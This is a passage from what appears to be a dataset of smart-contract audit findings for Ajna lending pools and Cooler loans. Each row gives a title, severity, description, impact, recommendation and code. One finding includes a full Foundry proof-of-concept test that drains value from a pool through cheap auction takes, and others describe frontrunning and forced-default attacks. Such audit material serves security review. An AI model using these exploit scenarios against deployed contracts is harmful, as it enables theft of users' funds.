bucket).\\n * @param tokenIds_ Array of NFT token ids to transfer from msg.sender to pool.\\n */\\nfunction _transferFromSenderToPool(\\n uint256[] storage poolTokens_,\\n uint256[] calldata tokenIds_\\n) internal {\\n bool subset = _getArgUint256(SUBSET) != 0;\\n uint8 nftType = _getArgUint8(NFT_TYPE);\\n\\n for (uint256 i = 0; i < tokenIds_.length;) {\\n uint256 tokenId = tokenIds_[i];\\n if (subset && !tokenIdsAllowed[tokenId]) revert OnlySubset();\\n poolTokens_.push(tokenId);\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(msg.sender, address(this), tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n else{\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).buyPunk(tokenId);\\n }\\n\\n unchecked { ++i; }\\n }\\n}\\n```\\n\\nand\\n```\\nuint8 nftType = _getArgUint8(NFT_TYPE);\\n\\nfor (uint256 i = 0; i < amountToRemove_;) {\\n uint256 tokenId = poolTokens_[--noOfNFTsInPool]; // start with transferring the last token added in bucket\\n poolTokens_.pop();\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(address(this), toAddress_, tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n }\\n else {\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).transferPunk(toAddress_, tokenId);\\n }\\n\\n tokensTransferred[i] = tokenId;\\n\\n unchecked { ++i; }\\n}\\n```\\n\\nnote if the NFT address is classified as either crypto kitties or crypto fighers, then the NFT type is classified as CryptoKitties, then transfer and transferFrom method is triggered.\\n```\\nif (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n```\\n\\nand\\n```\\nelse if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n}\\n```\\n\\nHowever, in both crypto-kitty and in crypto-figher NFT, the transfer and transferFrom method can be paused.\\nIn crypto-figher NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n public\\n whenNotPaused\\n{\\n```\\n\\nIn Crypto-kitty NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n external\\n whenNotPaused\\n{\\n```\\n\\nnote the WhenNotPaused modifier.","Issue CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interest\\nInterest should not be charged when external contract is paused to borrower when the external contract pause the transfer and transferFrom.","If the transfer and transferFrom is paused in CryptoKitty and CryptoFighter NFT, the borrowing and repaying and liquidating action is blocked in ERC721Pool, the user cannot fully clear his debt and has to pay the compounding interest when the transfer is paused.","```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n" +`moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accounting,high,"Both `removeQuoteToken()` and `moveQuoteToken()` can be used to completely remove all quote tokens from a bucket. When this happens, if at the same time `bucketCollateral == 0 && lpsRemaining != 0`, then the bucket should be declared bankrupt. This update is done in `removeQuoteToken()` but not in `moveQuoteToken()`.\\n`removeQuoteToken()` has the following check to update bankruptcy time when collateral and quote token remaining is 0, but lps is more than 0. `moveQuoteToken()` is however missing this check. Both this functions has the same effects on the `fromBucket` and the only difference is that `removeQuoteToken()` returns the token to `msg.sender` but `moveQuoteToken()` moves the token to another bucket.\\n```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\n",Issue `moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accounting\\nWe should check if a bucket is bankrupt after moving quote tokens.,"A future depositor to the bucket will get less lps than expected due to depositing in a bucket that is supposedly bankrupt, hence the lps they get will be diluted with the existing ones in the bucket.","```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\n" +The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage control,high,"The deposit / withdraw / trade transaction lack of expiration timestamp and slippage control\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long and the trading activity is very time senstive. Without deadline check, the trade transaction can be executed in a long time after the user submit the transaction, at that time, the trade can be done in a sub-optimal price, which harms user's position.\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.\\nthe second point is the slippage control:\\n```\\nrequire(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n```\\n\\nand\\n```\\nrequire(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n```\\n\\nthe slippage control the user can receive the least optimal amount of the token they want to trade.\\nIn the current implementation, neither the deadline check nor the slippage control is in place when user deposit / withdraw / trade.",Issue The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage control\\nWe recommend the protocol add deadline check and add slippage control.,"According to the whitepaper:\\nDeposits in the highest priced buckets offer the highest valuations on collateral, and hence offer the most liquidity to borrowers. They are also the first buckets that could be used to purchase collateral if a loan were to be liquidated (see 7.0 LIQUIDATIONS). We can think of a bucket's deposit as being utilized if the sum of all deposits in buckets priced higher than it is less than the total debt of all borrowers in the pool. The lowest price among utilized buckets or “lowest utilized price” is called the LUP. If we were to pair off lenders with borrowers, matching the highest priced lenders' deposits with the borrowers' debts in equal quantities, the LUP would be the price of the marginal (lowest priced and therefore least aggressive) lender thus matched (usually, there would be a surplus of lenders that were not matched, corresponding to less than 100% utilization of the pool).\\nThe LUP plays a critical role in Ajna: a borrower who is undercollateralized with respect to the LUP (i.e. with respect to the marginal utilized lender) is eligible for liquidation. Conversely, a lender cannot withdraw deposit if doing so would move the LUP down so far as to make some active loans eligible for liquidation. In order to withdraw quote token in this situation, the lender must first kick the loans in question.\\nBecause the deadline check is missing,\\nAfter a lender submit a transaction and want to add the token into Highest price busket to make sure the quote token can be borrowed out and generate yield.\\nHowever, the transaction is pending in the mempool for a very long time.\\nBorrower create more debt and other lender's add and withdraw quote token before the lender's transaction is executed.\\nAfter a long time later, the lender's transaction is executed.\\nThe lender find out that the highest priced bucket moved and the lender cannot withdraw his token because doing would move the LUP down eligible for liquidiation.\\nAccording to the whitepaper:\\n6.1 Trading collateral for quote token\\nDavid owns 1 ETH, and would like to sell it for 1100 DAI. He puts the 1 ETH into the 1100 bucket as claimable collateral (alongside Carol's 20000 deposit), minting 1100 in LPB in return. He can then redeem that 1100 LPB for quote token, withdrawing 1100 DAI. Note: after David's withdrawal, the LUP remains at 1100. If the book were different such that his withdrawal would move the LUP below Bob's threshold price of 901.73, he would not be able to withdraw all of the DAI.\\nThe case above is ideal, however, because the deadline check is missing, and there is no slippage control, the transactoin can be pending for a long time and by the time the trade transaction is lended, the withdraw amount can be less than 1100 DAI.\\nAnother example for lack of slippage, for example, the function below is called:\\n```\\n/// @inheritdoc IPoolLenderActions\\nfunction removeQuoteToken(\\n uint256 maxAmount_,\\n uint256 index_\\n) external override nonReentrant returns (uint256 removedAmount_, uint256 redeemedLPs_) {\\n _revertIfAuctionClearable(auctions, loans);\\n\\n PoolState memory poolState = _accruePoolInterest();\\n\\n _revertIfAuctionDebtLocked(deposits, poolBalances, index_, poolState.inflator);\\n\\n uint256 newLup;\\n (\\n removedAmount_,\\n redeemedLPs_,\\n newLup\\n ) = LenderActions.removeQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n RemoveQuoteParams({\\n maxAmount: maxAmount_,\\n index: index_,\\n thresholdPrice: Loans.getMax(loans).thresholdPrice\\n })\\n );\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, newLup);\\n\\n // move quote token amount from pool to lender\\n _transferQuoteToken(msg.sender, removedAmount_);\\n}\\n```\\n\\nwithout specificing the minReceived amount, the removedAmount can be very small comparing to the maxAmount user speicifced.","```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n" +Adversary can grief kicker by frontrunning kickAuction call with a large amount of loan,medium,"Average debt size of the pool is used to calculated MOMP (Most optimistic matching price), which is used to derive NP (neutral price). Higher average debt size will result in lower MOMP and hence lower NP which will make it harder for kicker to earn a reward and more likely that the kicker is penalized. An adversary can manipulate the average debt size of the pool by frontrunning kicker's `kickAuction` call with a large amount of loan.\\nNP (neutral price) is a price that will be used to decide whether to reward a kicker with a bonus or punish the kicker with a penalty. In the event the auction ends with a price higher than NP, kicker will be given a penalty and if the auction ends with a price lower than NP, kicker will be rewarded with a bonus.\\nNP is derived from MOMP (Most optimistic matching price). BI refers to borrower inflator. Quoted from the whitepaper page 17, When a loan is initiated (the first debt or additional debt is drawn, or collateral is removed from the loan), the neutral price is set to the current MOMP times the ratio of the loan's threshold price to the LUP, plus one year's interest. As time passes, the neutral price increases at the same rate as interest. This can be expressed as the following formula for the neutral price as a function of time 𝑡, where 𝑠 is the time the loan is initiated.\\n```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n\\nTherefore the lower the MOMP, the lower the NP. Lower NP will mean that kicker will be rewarded less and punished more compared to a higher NP. Quoted from the white paper, The MOMP, or “most optimistic matching price,” is the price at which a loan of average size would match with the most favorable lenders on the book. Technically, it is the highest price for which the amount of deposit above it exceeds the average loan debt of the pool. In `_kick` function, MOMP is calculated as this. Notice how total pool debt is divided by number of loans to find the average loan debt size.\\n```\\n uint256 momp = _priceAt(\\n Deposits.findIndexOfSum(\\n deposits_,\\n Maths.wdiv(poolState_.debt, noOfLoans * 1e18)\\n )\\n );\\n```\\n\\nAn adversary can frontrun `kickAuction` by taking a huge loan, causing the price for which the amount of deposit above the undercollaterized loan bucket to have a lower probability of surpassing the average loan debt. The adversary can use the deposits for the buckets above and the total pool debt to figure out how much loan is necessary to grief the kicker significantly by lowering the MOMP and NP.",Recommend taking the snapshot average loan size of the pool to prevent frontrunning attacks.,"Kickers can be grieved which can disincentivize user from kicking loans that deserve to be liquidated, causing the protocol to not work as desired as undercollaterized loans will not be liquidated.",```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n +Auction timers following liquidity can fall through the floor price causing pool insolvency,medium,"When a borrower cannot pay their debt in an ERC20 pool, their position is liquidated and their assets enter an auction for other users to purchase small pieces of their assets. Because of the incentive that users wish to not pay above the standard market price for a token, users will generally wait until assets on auction are as cheap as possible to purchase however, this is flawed because this guarantees a loss for all lenders participating in the protocol with each user that is liquidated.\\nConsider a situation where a user decides to short a coin through a loan and refuses to take the loss to retain the value of their position. When the auction is kicked off using the `kick()` function on this user, as time moves forward, the price for puchasing these assets becomes increasingly cheaper. These prices can fall through the floor price of the lending pool which will allow anybody to buy tokens for only a fraction of what they were worth originally leading to a state where the pool cant cover the debt of the user who has not paid their loan back with interest. The issue lies in the `_auctionPrice()` function of the `Auctions.sol` contract which calculates the price of the auctioned assets for the taker. This function does not consider the floor price of the pool. The proof of concept below outlines this scenario:\\nProof of Concept:\\n```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, ""DAI / WETH Pool Three"");\\n\\n // Setup scenario and send liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(""ERC20_NON_SUBSET_HASH"");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), """");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\n","It's recommended that the price of the assets on auction consider the fenwick(s) being used when determining the price of assets on loan and do not fall below that particular index. With this fix in place, the worst case scenario is that lenders can pruchase these assets for the price they were loaned out for allowing them to recover the loss.",An increase in borrowers who cant pay their debts back will result in a loss for all lenders.,"```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, ""DAI / WETH Pool Three"");\\n\\n // Setup scenario and send liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(""ERC20_NON_SUBSET_HASH"");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), """");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), """");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\n" +Incorrect MOMP calculation in neutral price calculation,medium,"When calculating MOMP to find the neutral price of a borrower, borrower's accrued debt is divided by the total number of loans in the pool, but it's total pool's debt that should be divided. The mistake will result in lower neutral prices and more lost bonds to kickers.\\nAs per the whitepaper:\\nMOMP: is the price at which the amount of deposit above it is equal to the average loan size of the pool. MOMP is short for “Most Optimistic Matching Price”, as it's the price at which a loan of average size would match with the most favorable lenders on the book.\\nI.e. MOMP is calculated on the total number of loans of a pool (so that the average loan size could be found).\\nMOMP calculation is implemented correctly when kicking a debt, however it's implementation in the Loans.update function is not correct:\\n```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n\\nHere, only borrower's debt (borrowerAccruedDebt_) is divided, not the entire debt of the pool.",Issue Incorrect MOMP calculation in neutral price calculation\\nConsider using total pool's debt in the MOMP calculation in `Loans.update`.,"The miscalculation affects only borrower's neutral price calculation. Since MOMP is calculated on a smaller debt (borrower's debt will almost always be smaller than total pool's debt), the value of MOMP will be smaller than expected, and the neutral price will also be smaller (from the whitepaper: ""The NP of a loan is the interest-adjusted MOMP...""). This will cause kickers to lose their bonds more often than expected, as per the whitepaper:\\nIf the liquidation auction yields a value that is over the “Neutral Price,” NP, the kicker forfeits a portion or all of their bond.","```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n" +Lender force Loan become default,high,"in `repay()` directly transfer the debt token to Lender, but did not consider that Lender can not accept the token (in contract blacklist), resulting in `repay()` always revert, and finally the Loan can only expire, Loan be default\\nThe only way for the borrower to get the collateral token back is to repay the amount owed via repay(). Currently in the repay() method transfers the debt token directly to the Lender. This has a problem: if the Lender is blacklisted by the debt token now, the debtToken.transferFrom() method will fail and the repay() method will always fail and finally the Loan will default. Example: Assume collateral token = ETH,debt token = USDC, owner = alice 1.alice call request() to loan 2000 usdc , duration = 1 mon 2.bob call clear(): loanID =1 3.bob transfer loan[1].lender = jack by Cooler.approve/transfer\\nNote: jack has been in USDC's blacklist for some reason before or bob in USDC's blacklist for some reason now, it doesn't need transfer 'lender') 4.Sometime before the expiration date, alice call repay(id=1) , it will always revert, Because usdc.transfer(jack) will revert 5.after 1 mon, loan[1] default, jack call defaulted() get collateral token\\n```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\n","Instead of transferring the debt token directly, put the debt token into the Cooler.sol and set like: withdrawBalance[lender]+=amount, and provide the method withdraw() for lender to get debtToken back","Lender forced Loan become default for get collateral token, owner lost collateral token","```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\n" +`Cooler.roll()` wouldn't work as expected when `newCollateral = 0`.,medium,"`Cooler.roll()` is used to increase the loan duration by transferring the additional collateral.\\nBut there will be some problems when `newCollateral = 0`.\\n```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n\\nIn `roll()`, it transfers the `newCollateral` amount of collateral to the contract.\\nAfter the borrower repaid most of the debts, `loan.amount` might be very small and `newCollateral` for the original interest might be 0 because of the rounding issue.\\nThen as we can see from this one, some tokens might revert for 0 amount and `roll()` wouldn't work as expected.","I think we should handle it differently when `newCollateral = 0`.\\nAccording to impact 2, I think it would be good to revert when `newCollateral = 0`.","There will be 2 impacts.\\nWhen the borrower tries to extend the loan using `roll()`, it will revert with the weird tokens when `newCollateral = 0`.\\nAfter the borrower noticed he couldn't repay anymore(so the lender will default the loan), the borrower can call `roll()` again when `newCollateral = 0`. In this case, the borrower doesn't lose anything but the lender must wait for `req.duration` again to default the loan.","```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert 